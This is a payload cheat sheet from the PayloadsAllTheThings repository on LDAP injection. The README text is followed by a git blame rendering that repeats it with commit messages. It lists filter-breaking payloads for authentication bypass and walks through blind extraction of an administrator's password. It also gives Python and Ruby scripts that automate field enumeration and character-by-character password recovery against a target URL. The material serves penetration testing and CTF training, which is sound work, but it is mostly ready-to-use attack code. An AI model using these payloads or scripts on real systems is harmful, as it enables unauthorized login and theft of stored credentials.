PayloadsAllTheThings/LDAP Injection/README.md

# LDAP Injection

> LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.


## Summary

* [Methodology](#methodology)
* [Payloads](#payloads)
* [Blind Exploitation](#blind-exploitation)
* [Defaults attributes](#defaults-attributes)
* [Exploiting userPassword attribute](#exploiting-userpassword-attribute)
* [Scripts](#scripts)
  * [Discover valid LDAP fields](#discover-valid-ldap-fields)
  * [Special blind LDAP injection](#special-blind-ldap-injection)
* [Labs](#labs)
* [References](#references)


## Methodology

Example 1.

```sql
user  = *)(uid=*))(|(uid=*
pass  = password
query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
```

Example 2

```sql
user  = admin)(!(&(1=0
pass  = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
```

## Payloads

```text
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
```

## Blind Exploitation

We can extract using a bypass login

```sql
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
(&(sn=administrator)(password=MY*))  : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK
```


## Defaults attributes

Can be used in an injection like `*)(ATTRIBUTE_HERE=*`

```bash
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName
```


## Exploiting userPassword attribute

`userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING
In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).

> octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.

```bash
userPassword:2.5.13.18:=\xx (\xx is a byte)
userPassword:2.5.13.18:=\xx\xx
userPassword:2.5.13.18:=\xx\xx\xx
```

## Scripts

### Discover valid LDAP fields

```python
#!/usr/bin/python3
import requests
import string

fields = []
url = 'https://URL.com/'
f = open('dic', 'r')
world = f.read().split('\n')
f.close()

for i in world:
    r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
    if 'TRUE CONDITION' in r.text:
        fields.append(str(i))

print(fields)
```

### Special blind LDAP injection (without "*")

```python
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break
```

Exploitation script by [@noraj](https://github.com/noraj)

```ruby
#!/usr/bin/env ruby
require 'net/http'
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')

flag = ''
(0..50).each do |i|
  puts("[i] Looking for number #{i}")
  alphabet.each do |char|
    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
    if /TRUE CONDITION/.match?(r)
      flag += char
      puts("[+] Flag: #{flag}")
      break
    end
  end
end
```


## Labs

* [Root Me - LDAP injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Authentication)
* [Root Me - LDAP injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Blind)


## References

- [[European Cyber Week] - AdmYSion - Alan Marrec (Maki)](https://www.maki.bzh/writeups/ecw2018admyssion/)
- [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN - October 31, 2018](https://0xukn.fr/posts/writeupecw2018admyssion/)
- [How To Configure OpenLDAP and Perform Administrative LDAP Tasks - Justin Ellingwood - May 30, 2015](https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
- [How To Manage and Use LDAP Servers with OpenLDAP Utilities - Justin Ellingwood - May 29, 2015](https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
- [LDAP Blind Explorer - Alonso Parada - August 12, 2011](http://code.google.com/p/ldap-blind-explorer/)
- [LDAP Injection & Blind LDAP Injection - Chema Alonso, José Parada Gimeno - October 10, 2008](https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf)
- [LDAP Injection Prevention Cheat Sheet - OWASP - July 16, 2019](https://www.owasp.org/index.php/LDAP_injection)
-												Normalize Titles

											
										
										
											2022-10-12 10:13:55 +00:00
+								# LDAP Injection
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Dependency Confusion + LDAP

											
										
										
											2021-07-04 11:32:32 +00:00
+								> LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
-												Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

											
										
										
											2024-11-10 14:28:12 +00:00
-												Dependency Confusion + LDAP

											
										
										
											2021-07-04 11:32:32 +00:00
+								## Summary
-												Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

											
										
										
											2024-11-10 14:28:12 +00:00
+								* [Methodology](#methodology)
-												Dependency Confusion + LDAP

											
										
										
											2021-07-04 11:32:32 +00:00
+								* [Payloads](#payloads)
 								* [Blind Exploitation](#blind-exploitation)
 								* [Defaults attributes](#defaults-attributes)
 								* [Exploiting userPassword attribute](#exploiting-userpassword-attribute)
 								* [Scripts](#scripts)
 								  * [Discover valid LDAP fields](#discover-valid-ldap-fields)
 								  * [Special blind LDAP injection](#special-blind-ldap-injection)
-												Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

											
										
										
											2024-11-10 14:28:12 +00:00
+								* [Labs](#labs)
 								* [References](#references)
-												LDAP & XPATH injection + Small fixes and payloads

											
										
										
											2017-07-14 21:40:31 +00:00
-												Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

											
										
										
											2024-11-10 14:28:12 +00:00
+								## Methodology
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Refactoring XSS 0/?

											
										
										
											2018-03-23 12:53:53 +00:00
+								Example 1.
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
 								```sql
-												LDAP & XPATH injection + Small fixes and payloads

											
										
										
											2017-07-14 21:40:31 +00:00
+								user  = *)(uid=*))(|(uid=*
 								pass  = password
-												Dependency Confusion + LDAP

											
										
										
											2021-07-04 11:32:32 +00:00
+								query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
-												LDAP & XPATH injection + Small fixes and payloads

											
										
										
											2017-07-14 21:40:31 +00:00
+								```
-												Refactoring XSS 0/?

											
										
										
											2018-03-23 12:53:53 +00:00
+								Example 2
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
 								```sql
-												Refactoring XSS 0/?

											
										
										
											2018-03-23 12:53:53 +00:00
+								user  = admin)(!(&(1=0
 								pass  = q))
 								query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
 								```
-												LDAP & XPATH injection + Small fixes and payloads

											
										
										
											2017-07-14 21:40:31 +00:00
+								## Payloads
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
 								```text
-												LDAP & XPATH injection + Small fixes and payloads

											
										
										
											2017-07-14 21:40:31 +00:00
+								*
 								*)(&
 								*))%00
-												LDAP fix typo + LDAP attributes + LFI filter chaining

											
										
										
											2018-11-02 12:50:56 +00:00
+								)(cn=))\x00
-												LDAP & XPATH injection + Small fixes and payloads

											
										
										
											2017-07-14 21:40:31 +00:00
+								*()|%26'
 								*()|&'
 								*(|(mail=*))
 								*(|(objectclass=*))
 								*)(uid=*))(|(uid=*
 								*/*
 								*|
 								/
 								//
 								//*
 								@*
 								|
 								admin*
 								admin*)((|userpassword=*)
 								admin*)((|userPassword=*)
 								x' or name()='username' or 'x'='y
 								```
 								## Blind Exploitation
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												LDAP & XPATH injection + Small fixes and payloads

											
										
										
											2017-07-14 21:40:31 +00:00
+								We can extract using a bypass login
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
 								```sql
-												LDAP & XPATH injection + Small fixes and payloads

											
										
										
											2017-07-14 21:40:31 +00:00
+								(&(sn=administrator)(password=*))    : OK
 								(&(sn=administrator)(password=A*))   : KO
 								(&(sn=administrator)(password=B*))   : KO
 								...
 								(&(sn=administrator)(password=M*))   : OK
 								(&(sn=administrator)(password=MA*))  : KO
 								(&(sn=administrator)(password=MB*))  : KO
 								...
 								(&(sn=administrator)(password=MY*))  : OK
 								(&(sn=administrator)(password=MYA*)) : KO
 								(&(sn=administrator)(password=MYB*)) : KO
 								(&(sn=administrator)(password=MYC*)) : KO
 								...
 								(&(sn=administrator)(password=MYK*)) : OK
 								(&(sn=administrator)(password=MYKE)) : OK
 								```
-												Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

											
										
										
											2024-11-10 14:28:12 +00:00
-												LDAP userPassword attribute

											
										
										
											2018-10-31 21:34:10 +00:00
+								## Defaults attributes
 								Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
 								```bash
 								userPassword
 								surname
 								name
 								cn
 								sn
 								objectClass
 								mail
 								givenName
 								commonName
 								```
-												Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

											
										
										
											2024-11-10 14:28:12 +00:00
-												LDAP userPassword attribute

											
										
										
											2018-10-31 21:34:10 +00:00
+								## Exploiting userPassword attribute
-												LDAP fix typo + LDAP attributes + LFI filter chaining

											
										
										
											2018-11-02 12:50:56 +00:00
+								`userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING
-												LDAP userPassword attribute

											
										
										
											2018-10-31 21:34:10 +00:00
+								In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
 								> octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
 								```bash
 								userPassword:2.5.13.18:=\xx (\xx is a byte)
 								userPassword:2.5.13.18:=\xx\xx
 								userPassword:2.5.13.18:=\xx\xx\xx
 								```
-												LDAPi: add scripts and dorks
											
										
										
											2020-02-21 22:19:48 +00:00
+								## Scripts
 								### Discover valid LDAP fields
 								```python
 								#!/usr/bin/python3
 								import requests
 								import string
 								fields = []
 								url = 'https://URL.com/'
-												Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

											
										
										
											2024-11-10 14:28:12 +00:00
+								f = open('dic', 'r')
-												Fix typos

											
										
										
											2024-09-16 16:05:54 +00:00
+								world = f.read().split('\n')
-												LDAPi: add scripts and dorks
											
										
										
											2020-02-21 22:19:48 +00:00
+								f.close()
-												Fix typos

											
										
										
											2024-09-16 16:05:54 +00:00
+								for i in world:
-												LDAPi: add scripts and dorks
											
										
										
											2020-02-21 22:19:48 +00:00
+								    r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
 								    if 'TRUE CONDITION' in r.text:
 								        fields.append(str(i))
 								print(fields)
 								```
-												Dependency Confusion + LDAP

											
										
										
											2021-07-04 11:32:32 +00:00
+								### Special blind LDAP injection (without "*")
-												LDAPi: add scripts and dorks
											
										
										
											2020-02-21 22:19:48 +00:00
 								```python
 								#!/usr/bin/python3
 								import requests, string
 								alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
 								flag = ""
 								for i in range(50):
 								    print("[i] Looking for number " + str(i))
 								    for char in alphabet:
-												add ruby script
											
										
										
											2020-02-21 22:49:50 +00:00
+								        r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
-												LDAPi: add scripts and dorks
											
										
										
											2020-02-21 22:19:48 +00:00
+								        if ("TRUE CONDITION" in r.text):
 								            flag += char
 								            print("[+] Flag: " + flag)
 								            break
 								```
-												Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

											
										
										
											2024-11-10 14:28:12 +00:00
+								Exploitation script by [@noraj](https://github.com/noraj)
-												LDAPi: add scripts and dorks
											
										
										
											2020-02-21 22:19:48 +00:00
-												add ruby script
											
										
										
											2020-02-21 22:49:50 +00:00
+								```ruby
 								#!/usr/bin/env ruby
 								require 'net/http'
 								alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
 								flag = ''
 								(0..50).each do |i|
 								  puts("[i] Looking for number #{i}")
 								  alphabet.each do |char|
 								    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
 								    if /TRUE CONDITION/.match?(r)
 								      flag += char
 								      puts("[+] Flag: #{flag}")
 								      break
 								    end
 								  end
 								end
 								```
-												Normalize page header for JWT, LDAP, LaTeX, OAuth, ORM

											
										
										
											2024-11-10 14:28:12 +00:00
 								## Labs
 								* [Root Me - LDAP injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Authentication)
 								* [Root Me - LDAP injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Blind)
-												add ruby script
											
										
										
											2020-02-21 22:49:50 +00:00
-												LDAPi: add scripts and dorks
											
										
										
											2020-02-21 22:19:48 +00:00
-												Adding references sectio

											
										
										
											2018-12-24 14:02:50 +00:00
+								## References
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												References updated for JWT, RMI, LDAP, LaTeX

											
										
										
											2024-11-07 13:50:52 +00:00
+								- [[European Cyber Week] - AdmYSion - Alan Marrec (Maki)](https://www.maki.bzh/writeups/ecw2018admyssion/)
 								- [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN - October 31, 2018](https://0xukn.fr/posts/writeupecw2018admyssion/)
 								- [How To Configure OpenLDAP and Perform Administrative LDAP Tasks - Justin Ellingwood - May 30, 2015](https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
 								- [How To Manage and Use LDAP Servers with OpenLDAP Utilities - Justin Ellingwood - May 29, 2015](https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
 								- [LDAP Blind Explorer - Alonso Parada - August 12, 2011](http://code.google.com/p/ldap-blind-explorer/)
 								- [LDAP Injection & Blind LDAP Injection - Chema Alonso, José Parada Gimeno - October 10, 2008](https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf)
 								- [LDAP Injection Prevention Cheat Sheet - OWASP - July 16, 2019](https://www.owasp.org/index.php/LDAP_injection)